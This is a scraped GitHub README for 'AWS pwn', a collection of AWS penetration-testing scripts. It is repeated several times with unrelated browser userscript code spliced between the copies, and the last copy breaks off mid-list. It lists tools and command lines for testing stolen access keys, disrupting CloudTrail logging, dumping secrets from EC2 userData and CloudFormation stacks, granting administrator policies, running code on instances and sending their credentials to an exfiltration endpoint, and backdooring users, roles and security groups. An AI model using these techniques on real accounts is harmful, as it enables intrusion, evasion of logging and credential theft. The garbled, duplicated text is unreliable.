Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Add copy buttons to all
 blocks\n(function() {\n function addCopyButtons() {\n document.querySelectorAll('pre code').forEach(function(codeBlock) {\n if (codeBlock.parentElement.hasAttribute('data-copy-added')) return;\n codeBlock.parentElement.setAttribute('data-copy-added', 'true');\n \n var btn = document.createElement('button');\n btn.textContent = 'Copy';\n btn.style.cssText = 'position:absolute;top:4px;right:4px;padding:2px 8px;font-size:11px;background:#4ecdc4;border:none;border-radius:4px;color:#1a1a2e;cursor:pointer;opacity:0.7;transition:opacity 0.2s;';\n btn.onmouseover = function() { this.style.opacity = '1'; };\n btn.onmouseout = function() { this.style.opacity = '0.7'; };\n btn.onclick = function() {\n navigator.clipboard.writeText(codeBlock.textContent).then(function() {\n btn.textContent = 'Copied!';\n setTimeout(function() { btn.textContent = 'Copy'; }, 1500);\n });\n };\n codeBlock.parentElement.style.position = 'relative';\n codeBlock.parentElement.appendChild(btn);\n });\n }\n \n addCopyButtons();\n \n // Re-run on dynamic content\n var observer = new MutationObserver(addCopyButtons);\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Add Copy Buttons to Code Blocks");
}
} catch(__e) { console.warn('[Userscript:Add Copy Buttons to Code Blocks]', __e); }
})();
(function(){
try {
var __m = "github.com";
var __re = new RegExp('^' + "github\\.com" + '
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Force GitHub README to respect dark mode\n(function() {\n var style = document.createElement('style');\n style.textContent = '\n .markdown-body {\n color-scheme: dark light;\n }\n .markdown-body pre { background: #161b22 !important; }\n .markdown-body code { background: rgba(110, 118, 129, 0.4) !important; }\n .markdown-body table th, .markdown-body table td { border-color: #30363d !important; }\n .markdown-body img { background: #0d1117; }\n .markdown-body blockquote { border-left-color: #8b949e; }\n .markdown-body hr { border-color: #30363d; }\n ';\n document.head.appendChild(style);\n})();", "GitHub Dark Mode README Fix"); } } catch(__e) { console.warn('[Userscript:GitHub Dark Mode README Fix]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Highlight search terms from Google/DuckDuckGo/Bing referrer\n(function() {\n var ref = document.referrer;\n var terms = [];\n \n if (ref.includes('google.com') || ref.includes('duckduckgo.com') || ref.includes('bing.com')) {\n var url = new URL(ref);\n var q = url.searchParams.get('q') || url.searchParams.get('p');\n if (q) {\n terms = q.split(/\\s+/).filter(function(t) { return t.length > 2; });\n }\n }\n \n if (terms.length === 0) return;\n \n var style = document.createElement('style');\n style.textContent = '.userscript-highlight { background: #fbbf24; color: #1a1a2e; padding: 1px 3px; border-radius: 2px; }';\n document.head.appendChild(style);\n \n function highlight(node) {\n if (node.nodeType === 3) { // text node\n var text = node.textContent;\n var found = false;\n terms.forEach(function(term) {\n var regex = new RegExp('(' + term.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\') + ')', 'gi');\n if (regex.test(text)) {\n found = true;\n var frag = document.createDocumentFragment();\n var parts = text.split(regex);\n parts.forEach(function(part, i) {\n if (i % 2 === 0) {\n frag.appendChild(document.createTextNode(part));\n } else {\n var span = document.createElement('span');\n span.className = 'userscript-highlight';\n span.textContent = part;\n frag.appendChild(span);\n }\n });\n node.parentNode.replaceChild(frag, node);\n }\n });\n } else if (node.nodeType === 1 && node.childNodes) { // element\n var skipTags = ['SCRIPT', 'STYLE', 'NOSCRIPT', 'TEXTAREA', 'INPUT', 'SELECT'];\n if (!skipTags.includes(node.tagName)) {\n Array.from(node.childNodes).forEach(highlight);\n }\n }\n }\n \n highlight(document.body);\n \n // Re-highlight on dynamic content\n var observer = new MutationObserver(function(mutations) {\n mutations.forEach(function(m) {\n m.addedNodes.forEach(function(node) {\n if (node.nodeType === 1 || node.nodeType === 3) highlight(node);\n });\n });\n });\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Highlight Search Terms"); } } catch(__e) { console.warn('[Userscript:Highlight Search Terms]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Strip utm_, fbclid, gclid, etc. from all links on page\n(function() {\n var trackingParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content',\n 'fbclid', 'gclid', 'dclid', 'msclkid', 'yclid',\n 'ref', 'ref_src', 'source', 'medium', 'campaign'];\n \n function cleanUrl(url) {\n try {\n var u = new URL(url, window.location.origin);\n var changed = false;\n trackingParams.forEach(function(p) {\n if (u.searchParams.has(p)) {\n u.searchParams.delete(p);\n changed = true;\n }\n });\n return changed ? u.toString() : url;\n } catch (e) {\n return url;\n }\n }\n \n function cleanLinks() {\n document.querySelectorAll('a[href]').forEach(function(a) {\n var clean = cleanUrl(a.href);\n if (clean !== a.href) a.href = clean;\n });\n }\n \n cleanLinks();\n \n var observer = new MutationObserver(function(mutations) {\n mutations.forEach(function(m) {\n m.addedNodes.forEach(function(node) {\n if (node.nodeType === 1) {\n if (node.tagName === 'A') cleanLinks();\n node.querySelectorAll('a[href]').forEach(function(a) {\n var clean = cleanUrl(a.href);\n if (clean !== a.href) a.href = clean;\n });\n }\n });\n });\n });\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Remove Tracking Parameters from Links"); } } catch(__e) { console.warn('[Userscript:Remove Tracking Parameters from Links]', __e); } })(); (function(){ try { var __m = "youtube.com"; var __re = new RegExp('^' + "youtube\\.com" + '
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Auto-enable theater mode on YouTube\n(function() {\n function tryTheater() {\n var btn = document.querySelector('button[aria-label=\"Theater mode\"], ytd-player #player button[title=\"Theater mode\"]');\n if (btn && !btn.classList.contains('activated')) {\n btn.click();\n }\n }\n \n // Try immediately\n tryTheater();\n \n // Try after navigation (SPA)\n var lastUrl = location.href;\n setInterval(function() {\n if (location.href !== lastUrl) {\n lastUrl = location.href;\n setTimeout(tryTheater, 500);\n }\n }, 1000);\n \n // Also try on player load\n var observer = new MutationObserver(tryTheater);\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "YouTube Theater Mode Default"); } } catch(__e) { console.warn('[Userscript:YouTube Theater Mode Default]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
